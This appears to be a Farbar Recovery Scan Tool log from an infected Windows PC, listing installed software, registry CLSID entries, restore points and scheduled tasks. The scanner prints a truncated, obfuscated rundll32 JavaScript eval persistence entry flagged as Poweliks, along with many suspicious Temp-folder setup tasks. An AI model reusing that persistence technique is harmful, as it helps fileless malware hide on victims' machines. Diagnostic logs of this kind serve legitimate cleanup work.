Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)

Banctec Service Agreement (HKLM\...\{42D68A86-DB1C-4256-B8C9-5D0D92919AF5}) (Version: 2.0.0 - Dell Inc.)

Battle.net (HKLM\...\Battle.net) (Version:  - Blizzard Entertainment)

Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)

Borderlands (HKLM\...\Steam App 8980) (Version:  - Gearbox Software)

Chantelise - Demo (HKLM\...\Steam App 70430) (Version:  - )

Choice Guard (Version: 1.2.87.0 - Microsoft Corporation) Hidden

Cisco EAP-FAST Module (HKLM\...\{415B2719-AD3A-4944-B404-C472DB6085B3}) (Version: 2.1.6 - Cisco Systems, Inc.)

Cisco LEAP Module (HKLM\...\{83770D14-21B9-44B3-8689-F7B523F94560}) (Version: 1.0.12 - Cisco Systems, Inc.)

Cisco PEAP Module (HKLM\...\{669C7BD8-DAA2-49B6-966C-F1E2AAE6B17E}) (Version: 1.0.13 - Cisco Systems, Inc.)

Curse (HKLM\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 6.0.0.0 - Curse)

Dell Dock (HKLM\...\{F6CB42B9-F033-4152-8813-FF11DA8E6A78}) (Version: 1.0.0 - Dell)

Dell Getting Started Guide (HKLM\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)

Dell Remote Access (HKLM\...\{F66A31D9-7831-4FBA-BA02-C411C0047CC5}) (Version: 1.0.0.0 - Dell Inc.)

Dell Support Center (Support Software) (HKLM\...\{E3BFEE55-39E2-4BE0-B966-89FE583822C1}) (Version: 2.2.08298 - Dell)

Dell Touchpad (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 7.2.115.201 - Alps Electric)

Dell Wireless WLAN Card Utility (HKLM\...\Broadcom 802.11 Application) (Version: 5.10.38.30 - Dell Inc.)

DELL0604 (Version: 1.0.0 - WildTangent) Hidden

DivX Setup (HKLM\...\DivX Setup) (Version: 2.6.1.24 - DivX, LLC)

Dual-Core Optimizer (HKLM\...\{9FD6F1A8-5550-46AF-8509-271DF0E768B5}) (Version: 1.1.4.0169 - AMD)

EDocs (HKLM\...\{6B7B6D4D-8F9B-4CB3-8CA4-BCA9CC4C1A22}) (Version:  - )

Evolve (HKLM\...\{670B1B49-9FD3-4827-9B41-471EFF580AA8}) (Version: 1.8.8 - Echobit, LLC)

Gmask 1.70 English (HKLM\...\Gmask 1.70 English) (Version:  - )

Google Toolbar for Internet Explorer (HKLM\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)

Google Toolbar for Internet Explorer (Version: 1.0.0 - Google Inc.) Hidden

Google Update Helper (Version: 1.3.25.5 - Google Inc.) Hidden

GoToAssist 8.0.0.514 (HKLM\...\GoToAssist) (Version:  - )

Graphical Analysis 3.4 (HKLM\...\{047B3D5A-3E67-429E-8A12-B204B6B31DF8}) (Version: 3.4 - Vernier Software & Technology)

Hearthstone (HKLM\...\Hearthstone) (Version:  - Blizzard Entertainment)

InstaCodecs (HKLM\...\InstaCodecs_is1) (Version: 1.0 - )

Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.1994 - Intel Corporation)

Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)

iTunes (HKLM\...\{5D928931-D1D2-4A93-A82D-BF60D0E7CFA5}) (Version: 12.0.1.26 - Apple Inc.)

Java 7 Update 71 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)

Jazz Jackrabbit 2 (HKLM\...\Jazz Jackrabbit 2) (Version:  - )

Juniper Networks, Inc. Setup Client Activex Control (HKLM\...\Juniper_Setup_Client Activex Control) (Version: 2.1.1.1 - Juniper Networks, Inc.)

Junk Mail filter update (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden

KAG 0.95A (HKLM\...\King Arthur's Gold (Alpha)_is1) (Version:  - Michal Marcinkowski THD)

Katawa Shoujo (HKLM\...\Katawa Shoujo) (Version:  - )

Katawa Shoujo Act 1 (HKLM\...\Katawa Shoujo Act 1) (Version:  - )

League of Legends (HKLM\...\League of Legends 3.0.0) (Version: 3.0.0 - Riot Games)

League of Legends (Version: 3.0.0 - Riot Games) Hidden

LIMBO (HKLM\...\Steam App 48000) (Version:  - )

LINE (HKLM\...\LINE) (Version: 3.7.6.116 - LINE Corporation)

Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)

MapleStory (HKLM\...\MapleStory) (Version:  - )

McAfee AntiVirus (HKLM\...\MSC) (Version: 12.8.988 - McAfee, Inc.)

McAfee Virtual Technician (HKLM\...\McAfee Virtual Technician) (Version: 6.5.0.2101 - McAfee, Inc.)

Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)

Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)

Microsoft Age of Empires II (HKLM\...\Age of Empires 2.0) (Version:  - )

Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)

Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)

Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)

Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)

Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)

Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)

Microsoft Sync Framework Services Native v1.0 (x86) (HKLM\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)

Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)

Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft XNA Framework Redistributable 4.0 (HKLM\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)

MSVCRT (Version: 14.0.1468.721 - Microsoft) Hidden

Mumble 1.2.8 (HKLM\...\{A9DBD31A-A09F-4C7E-86D1-3B21C59000D1}) (Version: 1.2.8 - Thorvald Natvig)

Nexon Game Manager (HKLM\...\{EA2DB6E0-72C5-4ef9-A3A0-E6705F4A6A9E}) (Version:  - )

NVIDIA PhysX (HKLM\...\{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}) (Version: 9.12.1031 - NVIDIA Corporation)

OGA Notifier 2.0.0048.0 (Version: 2.0.0048.0 - Microsoft Corporation) Hidden

Pando Media Booster (HKLM\...\{980A182F-E0A2-4A40-94C1-AE0C1235902E}) (Version: 2.3.6.0 - Pando Networks Inc.)

Peggle Deluxe (HKLM\...\Steam App 3480) (Version:  - PopCap Games, Inc.)

Pokemon Showdown (HKLM\...\Pokemon Showdown) (Version:  - "Pokemon Showdown")

Portal (HKLM\...\Steam App 400) (Version:  - Valve)

PowerDVD (HKLM\...\{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}) (Version: 8.1 - Dell)

Project64 1.6 (HKLM\...\{9559F7CA-5E34-4237-A2D9-D856464AD727}) (Version: 1.6 - Project64)

Psychonauts (HKLM\...\Steam App 3830) (Version:  - Double Fine Productions, Inc.)

QuickSet (HKLM\...\{C4972073-2BFE-475D-8441-564EA97DA161}) (Version: 9.2.11 - Dell Inc.)

QuickTime (HKLM\...\{C9E14402-3631-4182-B377-6B0DFB1C0339}) (Version: 7.70.80.34 - Apple Inc.)

Recettear: An Item Shop's Tale - Demo (HKLM\...\Steam App 70410) (Version:  - EasyGameStation)

Roxio Creator DE (HKLM\...\{09760D42-E223-42AD-8C3E-55B47D0DDAC3}) (Version: 10.1 - Roxio)

Shared C Run-time for x86 (Version: 10.0.0 - McAfee) Hidden

Skype™ 6.21 (HKLM\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.21.104 - Skype Technologies S.A.)

Spelling Dictionaries Support For Adobe Reader 9 (HKLM\...\{AC76BA86-7AD7-5464-3428-900000000004}) (Version: 9.0.0 - Adobe Systems Incorporated)

Star Wars Jedi Knight Jedi Academy (HKLM\...\{1EECBA68-8BE4-4076-94DF-E9ED206B1D21}) (Version:  - )

Steam (HKLM\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)

System Requirements Lab Detection (HKLM\...\{23C1EA28-BA75-469D-864C-9880D35AB582}) (Version: 2.2.1.0 - Husdawg, LLC)

TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.8.1 - TeamSpeak Systems GmbH)

Terraria (HKLM\...\Steam App 105600) (Version:  - Re-Logic)

The Elder Scrolls Online (HKLM\...\The Elder Scrolls Online) (Version: 1.0.0.0 - Zenimax Online Studios)

Unturned (HKLM\...\Steam App 304930) (Version:  - Nelson Sexton)

Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)

VC80CRTRedist - 8.0.50727.6195 (Version: 1.2.0 - DivX, Inc) Hidden

Vindictus (HKLM\...\Steam App 212160) (Version:  - Nexon)

VLC media player (HKLM\...\VLC media player) (Version: 2.1.5 - VideoLAN)

Voyetra Record Producer (HKLM\...\InstallShield_{28358FC7-703D-4D27-B791-B93C36650157}) (Version: 5.01.4100 - Voyetra Turtle Beach, Inc.)

Voyetra Record Producer (Version: 5.01.4100 - Voyetra Turtle Beach, Inc.) Hidden

Windows Live Essentials (HKLM\...\WinLiveSuite_Wave3) (Version: 14.0.8050.1202 - Microsoft Corporation)

Windows Live Sign-in Assistant (HKLM\...\{9422C8EA-B0C6-4197-B8FC-DC797658CA00}) (Version: 5.000.818.6 - Microsoft Corporation)

Windows Live Sync (HKLM\...\{FDD810CA-D5E3-40E9-AB7B-36440B0D41EF}) (Version: 14.0.8050.1202 - Microsoft Corporation)

Windows Live Upload Tool (HKLM\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)

WinRAR 4.00 (32-bit) (HKLM\...\WinRAR archiver) (Version: 4.00.0 - win.rar GmbH)

Xiph.Org Ogg Codecs 0.83.17220 32-bit (HKLM\...\Ogg Codecs) (Version: 0.83.17220 - Xiph.Org)

Xiph.Org Open Codecs 0.85.17777 (HKLM\...\Open Codecs) (Version: 0.85.17777 - Xiph.Org)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{022105BD-948A-40C9-AB42-A3300DDF097F}\localserver32 -> C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe (Google Inc.)

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{035FBE31-3755-450A-A775-5E6BBD43D344}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.21.135\psuser.dll No File

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\psuser.dll (Google Inc.)

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{1c492e6a-2803-5ed7-83e1-1b1d4d41eb39}\InprocServer32 -> C:\Program Files\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll No File

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{22181302-A8A6-4F84-A541-E5CBFC70CC43}\localserver32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\GoogleUpdateOnDemand.exe (Google Inc.)

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{2F0E2680-9FF5-43C0-B76E-114A56E93598}\localserver32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\GoogleUpdateOnDemand.exe (Google Inc.)

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{31261F21-2B16-45EE-BEAB-07C4CFA18B65}\InprocServer32 -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.23.9\psuser.dll No File

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\InprocServer32 -> C:\Users\Tyler\AppData\LocalLow\Unity\WebPlayer\loader\UnityWebPluginAX.ocx (Unity Technologies ApS)

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{51F9E8EF-59D7-475B-A106-C7EA6F30C119}\localserver32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\GoogleUpdateOnDemand.exe (Google Inc.)

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{5C65F4B0-3651-4514-B207-D10CB699B14B}\localserver32 -> C:\Users\Tyler\AppData\Local\Google\Chrome\Application\38.0.2125.111\delegate_execute.exe (Google Inc.)

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{62A0D750-DED9-448C-B693-406B34BB0892}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.21.145\psuser.dll No File

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{634059C0-D264-4B2C-AE80-F73E48D33E5B}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.21.123\psuser.dll No File

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{6D7374DE-63AA-473C-8C02-60D9CDCD84C5}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.21.153\psuser.dll No File

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.24.15\psuser.dll No File

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{91EFB276-CEFE-48EC-BB3A-57795A7B4008}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.21.149\psuser.dll No File

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{A45426FB-E444-42B2-AA56-419F8FBEEC61}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.22.3\psuser.dll No File

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{A54D478D-4F70-4F72-9A74-17C9986E35AB}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.21.165\psuser.dll No File

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{C3101A8B-0EE1-4612-BFE9-41FFC1A3C19D}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{C442AC41-9200-4770-8CC0-7CDB4F245C55}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{E67BE843-BBBE-4484-95FB-05271AE86750}\localserver32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\GoogleUpdateOnDemand.exe (Google Inc.)

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\psuser.dll (Google Inc.)

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{EB06378B-ABB6-4B3C-9B40-D488DD8A6E93}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.22.5\psuser.dll No File

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.24.7\psuser.dll No File

 

==================== Restore Points  =========================

 

03-10-2014 00:14:48 Scheduled Checkpoint

04-10-2014 02:47:13 Device Driver Package Install: Apple, Inc. Universal Serial Bus controllers

05-10-2014 17:08:11 Scheduled Checkpoint

09-10-2014 21:19:18 Scheduled Checkpoint

16-10-2014 21:27:02 Installed Java 7 Update 71

17-10-2014 02:54:45 Installed System Requirements Lab Detection

17-10-2014 07:01:39 Windows Update

23-10-2014 23:24:10 Scheduled Checkpoint

01-11-2014 02:34:50 Scheduled Checkpoint

03-11-2014 23:36:57 Scheduled Checkpoint

09-11-2014 08:34:53 herdProtect before 20 removals

 

==================== Hosts content: ==========================

 

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

 

2006-11-02 05:23 - 2006-09-18 16:41 - 00000761 ____A C:\Windows\system32\Drivers\etc\hosts

127.0.0.1       localhost

::1             localhost

 

==================== Scheduled Tasks (whitelisted) =============

 

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

 

Task: {02F3A87A-548F-47BC-BD68-5A888092064A} - \723068096 No Task File <==== ATTENTION

Task: {03F376E0-F1CB-4296-B87B-4B309DB588CD} - System32\Tasks\winupd => C:\Users\Tyler\AppData\Local\Temp:winupd.exe

Task: {0AC14CC6-C57B-4E94-AEF6-C84CDCDD4568} - System32\Tasks\GoogleUpdateTaskMachineUA1cfec4f46187060 => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-20] (Google Inc.)

Task: {1097C274-B2F3-48B9-9A33-BB93A58AE7A4} - System32\Tasks\41e4db80 => C:\Users\Tyler\AppData\Local\Temp\\setup580511104.exe <==== ATTENTION

Task: {12E04DA3-AC3E-4876-97D2-2B5068500975} - System32\Tasks\2b8cf180 => C:\Users\Tyler\AppData\Local\Temp\\setup2968322816.exe <==== ATTENTION

Task: {1E9DA8F4-3624-4D36-9935-C638BF1BF2C8} - \1854721336 No Task File <==== ATTENTION

Task: {2086FFDA-25FD-41B6-8B15-B04E039FB5A7} - System32\Tasks\3db6c280 => C:\Users\Tyler\AppData\Local\Temp\\setup2671896960.exe <==== ATTENTION

Task: {22EDF7AF-765C-481D-B0F0-F35C8E5B42D2} - System32\Tasks\1282a400 => C:\Users\Tyler\AppData\Local\Temp\\setup2020529920.exe <==== ATTENTION

Task: {2D9354A7-0098-4C70-AF65-3E9ACDE16AD8} - \2105017024 No Task File <==== ATTENTION

Task: {347B25AD-737F-4CB2-9CE4-B7143274228A} - System32\Tasks\win402b40 => C:\Users\Tyler\AppData\Local\Temp\win402b40.dat <==== ATTENTION

Task: {3F4E49C7-1C2F-4FB9-B036-D5125C75F62D} - System32\Tasks\Launch BCM WLAN Tray => C:\Windows\system32\WLTRAY.EXE [2008-12-22] (Dell Inc.)

Task: {48ED1995-0CAB-4211-A9D0-4A431EA2D062} - System32\Tasks\dd91ed80 => C:\Users\Tyler\AppData\Local\Temp\\setup731568512.exe <==== ATTENTION

Task: {4A9850DC-9325-4F8E-9F8F-BC7A334C11CC} - \612777664 No Task File <==== ATTENTION

Task: {54659C83-9DFE-4ECB-AE9D-D6527B229EF3} - \2778588544 No Task File <==== ATTENTION

Task: {5581028F-00F2-4331-AF8D-49606E3588AA} - System32\Tasks\5c3cd980 => C:\Users\Tyler\AppData\Local\Temp\\setup2856699264.exe <==== ATTENTION

Task: {5B5DF183-F14E-4E77-945A-39A2D2863E06} - \3106137952 No Task File <==== ATTENTION

Task: {62BA65A3-F904-4AC4-86ED-9C2355F937E8} - \77464128 No Task File <==== ATTENTION

Task: {635409A9-D3ED-44BA-88AC-8261B1450358} - System32\Tasks\1e723ec0 => C:\Users\Tyler\AppData\Local\Temp\\setup2709505536.exe <==== ATTENTION

Task: {65A519A5-404C-4F00-8901-FBE3928E9616} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-20] (Google Inc.)

Task: {6A669327-4173-4D1D-B406-6AC69FAD66EB} - System32\Tasks\8728f2c0 => C:\Users\Tyler\AppData\Local\Temp\\setup3760815040.exe <==== ATTENTION

Task: {6F6E9732-E8BD-467A-8947-4D956FBFB026} - System32\Tasks\c584be80 => C:\Users\Tyler\AppData\Local\Temp\\setup378817920.exe <==== ATTENTION

Task: {784E7FC3-2476-4EBB-B997-81A1F8959E44} - System32\Tasks\14770480 => C:\Users\Tyler\AppData\Local\Temp\\setup1325249920.exe <==== ATTENTION

Task: {78894A2C-9761-42DF-9B27-7560BF67DA72} - System32\Tasks\3d62c280 => C:\Users\Tyler\AppData\Local\Temp\\setup2389856640.exe <==== ATTENTION

Task: {79F67B3A-4697-46A2-BED6-B71965760E83} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000Core => C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe [2012-09-19] (Google Inc.)

Task: {7A37EF97-DB03-409A-AA13-EE2066C8CA16} - \1837831808 No Task File <==== ATTENTION

Task: {7AC62A27-75DB-4C4B-9D97-09C9CEFD1F9A} - System32\Tasks\a9ca0c80 => C:\Users\Tyler\AppData\Local\Temp\\setup3830496640.exe <==== ATTENTION

Task: {8576719E-EA86-405E-86DB-87A849BFF5C7} - System32\Tasks\p9pl5944863637826728850 => \\?\globalroot\Device\HarddiskVolume3\Users\Tyler\AppData\Local\Temp\p9pl5944863637826728850.tmp <==== ATTENTION

Task: {8E2D0CED-A382-4C75-AE93-C0A74561308A} - System32\Tasks\ec10ca40 => C:\Users\Tyler\AppData\Local\Temp\\setup802090624.exe <==== ATTENTION

Task: {8F2D83C7-454E-498B-AA2C-76F5345946AA} - System32\Tasks\59c9e100 => C:\Users\Tyler\AppData\Local\Temp\\setup3556369856.exe <==== ATTENTION

Task: {934728FC-EE47-4533-8858-A8E13EED00E9} - System32\Tasks\AdobeAAMUpdater-1.0-Tyler-PC-Tyler => C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2010-03-06] (Adobe Systems Incorporated)

Task: {960BD142-4858-4A58-A5B4-6941A9B56291} - \735723520 No Task File <==== ATTENTION

Task: {9CE86707-2679-4ED1-B2BC-521F4AED3520} - System32\Tasks\90bebf80 => C:\Users\Tyler\AppData\Local\Temp\\setup1903413632.exe <==== ATTENTION

Task: {9E17A182-5687-427B-B1EC-28EE0EEFAD54} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000UA1cfeb0948c7c370 => C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe [2012-09-19] (Google Inc.)

Task: {A6AFE3FF-EBD9-4327-A603-C08004EDF913} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)

Task: {A8BB84DE-677F-48BE-9A35-D1D1A2A0AD5D} - System32\Tasks\GoogleUpdateTaskMachineCore1cf2ca2e648d290 => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-20] (Google Inc.)

Task: {A9462BA2-5504-4C3E-8B84-0D9A2F7FC854} - System32\Tasks\582b9f80 => C:\Users\Tyler\AppData\Local\Temp\\setup954247552.exe <==== ATTENTION

Task: {B6A9B53F-7B1E-460E-8B25-417D3CE85E46} - \4104635328 No Task File <==== ATTENTION

Task: {B90EC509-EFFD-479F-B674-1098EF69ADE3} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000UA => C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe [2012-09-19] (Google Inc.)

Task: {BA07379C-921B-4AB1-8585-733D746B82DD} - \3975815936 No Task File <==== ATTENTION

Task: {BB542176-A526-4360-A650-B4A433AA62BA} - \3426028800 No Task File <==== ATTENTION

Task: {C090D641-39F5-4A04-88FD-0FF938662580} - System32\Tasks\win4036e0 => C:\Users\Tyler\AppData\Local\Temp\win4036e0.dat <==== ATTENTION

Task: {C15A3FCC-C99B-46B5-9D09-024F7268B652} - \3436031516 No Task File <==== ATTENTION

Task: {CCC2CDBA-04B8-4B4E-BB8E-2FB9747E7DEB} - System32\Tasks\a0168f00 => C:\Users\Tyler\AppData\Local\Temp\\setup2160826624.exe <==== ATTENTION

Task: {D5C774FE-AA3F-4944-BC4D-6DC2983A11AC} - \1067678144 No Task File <==== ATTENTION

Task: {DFDCAB67-7DAA-42D9-9555-A6C60AD5F35B} - \1015687112 No Task File <==== ATTENTION

Task: {EBC8DC2B-B1E1-4B3B-AD7B-6A54AC321E13} - System32\Tasks\p9pl388102792662700970 => \\?\globalroot\Device\HarddiskVolume3\Users\Tyler\AppData\Local\Temp\p9pl388102792662700970.tmp <==== ATTENTION

Task: {ECA6FEB7-4FF1-4A7F-8724-E8C80FD48DFB} - System32\Tasks\c52a4280 => C:\Users\Tyler\AppData\Local\Temp\\setup372887936.exe <==== ATTENTION

Task: {F054D8E5-C40B-40BF-991E-1BFD143B3D9E} - \193991460 No Task File <==== ATTENTION

Task: {FB20997B-71A1-4145-9D52-A9166159F737} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)

 

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

 

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1cf2ca2e648d290.job => C:\Program Files\Google\Update\GoogleUpdate.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1cfec4f46187060.job => C:\Program Files\Google\Update\GoogleUpdate.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000Core.job => C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe

